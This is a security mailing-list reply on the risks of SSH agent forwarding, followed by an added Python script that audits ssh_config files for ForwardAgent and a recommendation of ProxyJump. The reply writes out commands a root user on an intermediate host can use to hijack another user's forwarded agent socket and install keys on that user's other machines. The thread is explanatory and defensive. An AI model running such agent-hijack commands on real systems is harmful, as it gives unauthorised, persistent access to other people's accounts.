lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <Pine.LNX.4.61.0602241341360.25908@pil.ledge.co.za>
Date: Fri Feb 24 11:54:03 2006
From: andrew2005 at ledge.co.za (Andrew McGill)
Subject: Tech Tip: An Illustrated Guide to SSH Agent Forwarding

On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,

> Hello all,
> 
> While trying to convince a customer that he really needs to get away
> from password auth on his SSH servers, I ended up diving in to make
> some detailed notes on how key agents and forwarding work. The outcome
> of this was a new Tech Tip which explains it in some detail:
> 
>   Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding
>   http://www.unixwiz.net/techtips/ssh-agent-forwarding.html
> 
> I hope some find this helpful.
> 
> Regards,
> Steve

Here's something you missed in the "Cons" section of agent 
forwarding:

  lala@...al:       ssh-add 
  lala@...al:         (enter key)
  lala@...al:       ssh -A customer

    lala@...tomer:  ssh remote

      lala@...ote:  sleep 86400

And while you are sleeping:
  root@...tomer does this:
	export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`	
	ssh-copy-id lala@...ote 
	ssh-copy-id lala@...al
	ssh-copy-id lala@...ercustomer
	ssh-copy-id lala@...aland

(Oops) (that's a lot easier than subverting ssh to insert 
something evil into the stream that will hack into the remote)

If there are untrusted machines involved you may prefer this:

  ssh-add -c

Note that ssh-agent does not identify the origin of requests for 
authentication (a bug?), so its confirmation is not fail-safe.

&:-)


-- 
Leading Edge Business Solutions              +27 11 656 0360
Linux Training, Software and Networking  http://ledge.co.za/

Linux - load nothing else

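The thread's point is that ForwardAgent exposes your agent to root on every intermediate host, and that `ssh-add -c` is only a partial fix. A defender's first step is knowing where forwarding is switched on at all, which is easy to get wrong because ssh(1) uses the first value it obtains for an option, so a trailing `Host *` default loses to any earlier block. The script below is an added example, not code from the original post or from the Unixwiz tech tip: it parses ssh_config text, resolves the effective ForwardAgent value per hostname with that first-match rule, and lists the hosts where forwarding is on. The config is a constructed sample, fnmatch stands in for ssh's own glob, and `Match` blocks are skipped (both assumptions).

```python
"""Audit an OpenSSH client config for agent forwarding (added example)."""
import re
from fnmatch import fnmatchcase

# Constructed sample ssh_config. Host-specific blocks come first, the
# catch-all "Host *" last, because ssh keeps the FIRST value it obtains.
SAMPLE_CONFIG = """
Host customer
    HostName customer.example
    User lala
    ForwardAgent yes

Host remote
    HostName remote.example
    ProxyJump customer        # reach remote via customer without an agent

Host *.internal
    ForwardAgent yes

Host *
    ForwardAgent no
"""


def parse_ssh_config(text):
    """Split ssh_config text into (host_patterns, options) blocks in file order.

    Options before the first Host line land in a block with pattern ['*'].
    Keywords are case-insensitive; '=' is accepted as a separator like
    whitespace. 'Match' blocks (assumption: none matter here) get an empty
    pattern list so they never apply.
    """
    blocks = []
    patterns, options = ["*"], {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"^(\w+)\s*=?\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            if options:
                blocks.append((patterns, options))
            patterns = value.split() if key == "host" else []
            options = {}
        else:
            options.setdefault(key, value)  # first occurrence in a block wins
    if options:
        blocks.append((patterns, options))
    return blocks


def host_matches(hostname, patterns):
    """ssh_config-style matching: some positive pattern must match and no
    negated ('!') pattern may match. fnmatch approximates ssh's glob."""
    positive = [p for p in patterns if not p.startswith("!")]
    negated = [p[1:] for p in patterns if p.startswith("!")]
    if any(fnmatchcase(hostname, p) for p in negated):
        return False
    return any(fnmatchcase(hostname, p) for p in positive)


def effective_option(blocks, hostname, option, default=None):
    """Resolve an option the way ssh(1) does: first obtained value wins."""
    option = option.lower()
    for patterns, options in blocks:
        if option in options and host_matches(hostname, patterns):
            return options[option]
    return default


def hosts_with_agent_forwarding(text, hostnames):
    """Return the hostnames whose effective ForwardAgent is anything but 'no'
    (ForwardAgent may also carry a socket path, so only 'no' means off)."""
    blocks = parse_ssh_config(text)
    return [
        h for h in hostnames
        if effective_option(blocks, h, "ForwardAgent", default="no").lower() != "no"
    ]


if __name__ == "__main__":
    hosts = ["customer", "remote", "db.internal", "bastion"]
    for h in hosts_with_agent_forwarding(SAMPLE_CONFIG, hosts):
        print(f"{h}: ForwardAgent is on; root there can use your agent")
```

For hosts that must hop through an intermediate, `ProxyJump` (as in the sample's `remote` block) routes the connection through the jump host without ever handing the agent socket to it, which removes the exposure the post describes rather than merely prompting for it as `ssh-add -c` does.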